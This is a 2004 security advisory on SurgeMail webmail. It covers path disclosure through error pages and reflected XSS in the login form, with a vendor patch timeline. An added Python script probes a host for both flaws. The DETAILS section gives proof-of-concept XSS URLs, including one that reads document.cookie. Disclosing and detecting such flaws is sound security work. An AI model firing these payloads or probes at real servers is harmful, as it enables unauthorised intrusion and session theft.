Message-ID: <BAY9-DAV28Dd3OJXsNQ000643a1@hotmail.com>
From: se_cur_ity at hotmail.com (morning_wood)
Subject: Surgemail - Multiple Vulnerabilities
------------------------------------------------------------
- EXPL-A-2004-002 exploitlabs.com Advisory 028 -
------------------------------------------------------------
- Surgemail -
OVERVIEW
========
"SurgeMail is a next generation Mail Server -
Combining features, performance and ease of
use into a single integrated product.
Ideal on Windows NT/2K, or Unix (Linux, Solaris etc)
and supports all the standard protocols
IMAP, POP3, SMTP, SSL, ESMTP."
Surgemail suffers from two basic remote vulnerabilities:
1. Information disclosure: requesting a non-existent filename causes the
STDERR output to be rendered to the user, disclosing the physical directory
structure of the installation.
2. XSS (cross-site scripting) via the login form, in particular the
"username" field. This allows credential theft via externally hosted
malicious script. It affects both the HTTP and HTTPS access vectors.
AFFECTED PRODUCTS
=================
Surgemail (Win32 and *nix, through version 1.9)
WebMail v3.1d Copyright © NetWin Ltd
http://netwinsite.com/index.html
http://netwinsite.com/overviews.htm
http://netwinsite.com/server/email_server_software.htm
DETAILS
=======
1. Information Disclosure
Surgemail's web-based interface reveals the physical directory
structure when a non-existent resource is requested (404). The error
text differs between the Win32 and *nix builds, but both echo the
installation path:
http://x.x.x.x/[non-existent request]
http://x.x.x.x:7080/scripts/
"Could not create process D:\surgemail/scripts/ Access Denied
Is the url correct, check for a log file in the scripts directory
and run the process in a shell window (D:\surgemail)"
http://x.x.x.x:7080/scripts/err.txt
"Could not create process D:\surgemail/scripts/err.txt File Not Found
Is the url correct, check for a log file in the scripts directory
and run the process in a shell window (D:\surgemail)"
http://x.x.x.x/scripts/err.txt
CGI did not respond correctly, it probably exited abnormally or the file
may not exist or have +x access (/usr/local/surgemail/scripts) (err.txt) ()
2. XSS ( cross site scripting )
The login form's username field is vulnerable to XSS; script supplied in
the request URL is reflected into the page unescaped:
================ snip ========================
http://x.x.x.x:7080/
http://x.x.x.x:7080/<script>alert('Vulnerable')</script>
http://x.x.x.x:7080/<script>alert(document.cookie)</script>
================ snip ========================
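A small check for both findings, as an added example that is not part of the original advisory or NetWin's code. It extracts the installation paths from the error strings quoted above, classifies whether a probe marker is reflected verbatim or HTML-escaped, and can be pointed at a live host. The sample responses are constructed from the strings in this advisory; the sample login page assumes the request path is copied into the username field's value attribute (an assumption), and `probe()` and `check_target()` are hypothetical helpers, not vendor APIs.

```python
"""
Checks for the two SurgeMail webmail issues in this advisory:
  1. error pages that echo the installation directory (path disclosure)
  2. request paths reflected unescaped into the login page (XSS)
Added example, not from the original advisory or from NetWin.
"""
import html
import re
import urllib.error
import urllib.parse
import urllib.request

# Constructed responses, copied from the error strings quoted in the advisory.
WIN32_404 = (
    "Could not create process D:\\surgemail/scripts/err.txt File Not Found\n"
    "Is the url correct, check for a log file in the scripts directory\n"
    "and run the process in a shell window (D:\\surgemail)\n"
)
UNIX_404 = (
    "CGI did not respond correctly, it probably exited abnormally or the file\n"
    "may not exist or have +x access (/usr/local/surgemail/scripts) (err.txt) ()\n"
)

# Constructed login pages (assumption: the request path lands in the username
# field); one reflects the marker raw, the fixed one HTML-escapes it.
XSS_MARKER = "<script>alert('Vulnerable')</script>"
VULN_LOGIN = (
    '<form action="/" method="post">\n'
    f'Username: <input name="username" value="{XSS_MARKER}">\n'
    "</form>\n"
)
FIXED_LOGIN = VULN_LOGIN.replace(XSS_MARKER, html.escape(XSS_MARKER, quote=True))

# Phrases that identify the SurgeMail CGI error page (from the advisory).
_DISCLOSURE_MARKERS = (
    "Could not create process",
    "CGI did not respond correctly",
    "run the process in a shell window",
)
# A Windows path starts with a drive letter; the *nix message puts the
# absolute path in parentheses.
_WIN_PATH = re.compile(r"""\b[A-Za-z]:[\\/][^\s()"']*""")
_UNIX_PATH = re.compile(r"""\((/[^\s()"']+)\)""")
_SCRIPTS_DIR = re.compile(r"[\\/]scripts(?=[\\/]|$)")


def disclosed_paths(body: str) -> list[str]:
    """Filesystem paths echoed by a SurgeMail error page, in order of
    appearance, deduplicated.  Empty if the body is not such an error page."""
    if not any(m in body for m in _DISCLOSURE_MARKERS):
        return []
    hits = [(m.start(), m.group(0)) for m in _WIN_PATH.finditer(body)]
    hits += [(m.start(), m.group(1)) for m in _UNIX_PATH.finditer(body)]
    found: list[str] = []
    for _, path in sorted(hits):
        if path not in found:
            found.append(path)
    return found


def install_roots(paths: list[str]) -> list[str]:
    """Strip the trailing /scripts component so the installation root is left."""
    roots: list[str] = []
    for p in paths:
        root = _SCRIPTS_DIR.split(p, maxsplit=1)[0]
        if root and root not in roots:
            roots.append(root)
    return roots


def xss_verdict(marker: str, body: str) -> str:
    """'unescaped' if the marker is reflected verbatim (exploitable),
    'escaped' if only an HTML-escaped copy is present, else 'absent'."""
    if marker in body:
        return "unescaped"
    if html.escape(marker, quote=True) in body or html.escape(marker, quote=False) in body:
        return "escaped"
    return "absent"


def probe(base_url: str, path: str, timeout: float = 10.0) -> str:
    """Hypothetical helper: fetch base_url + path and return the body even for
    error status codes (the 404 body is what the disclosure check needs)."""
    req = urllib.request.Request(base_url.rstrip("/") + path,
                                 headers={"User-Agent": "surgemail-check"})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.read().decode("latin-1")
    except urllib.error.HTTPError as err:
        return err.read().decode("latin-1")


def check_target(base_url: str) -> dict:
    """Hypothetical helper: run both checks against a live web interface,
    e.g. check_target('http://x.x.x.x:7080')."""
    paths = disclosed_paths(probe(base_url, "/scripts/err.txt"))
    login = probe(base_url, "/" + urllib.parse.quote(XSS_MARKER, safe=""))
    return {"disclosed_paths": paths, "install_roots": install_roots(paths),
            "xss": xss_verdict(XSS_MARKER, login)}


if __name__ == "__main__":
    print(disclosed_paths(WIN32_404), install_roots(disclosed_paths(UNIX_404)))
    print(xss_verdict(XSS_MARKER, VULN_LOGIN), xss_verdict(XSS_MARKER, FIXED_LOGIN))
```

`xss_verdict` distinguishes a raw reflection from an escaped one, so the same check can confirm that a patched server no longer reflects the payload rather than merely noting that the marker text came back.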
SOLUTION
========
Vendor contacted May 16, 2003 at support-surgemail@...winsite.com
Vendor acknowledgement received May 17, 2003
Vendor patch / version 2.0c released June 2, 2004,
and may be obtained at
ftp://ftp.netwinsite.com/pub/surgemail/beta
http://www.netwinsite.com/surgemail/help/updates.htm
PROOF OF CONCEPT
================
( see DETAILS )
CREDITS
=======
These vulnerabilities were discovered and researched by
Donnie Werner of exploitlabs
mail: morning_wood@...loitlabs.com
--
web: http://exploitlabs.com
web: http://zone-h.org
ref: http://zone-h.org/en/advisories/read/id=4714/
ref: http://exploitlabs.com/files/advisories/EXPL-A-2004-002-surgmail.txt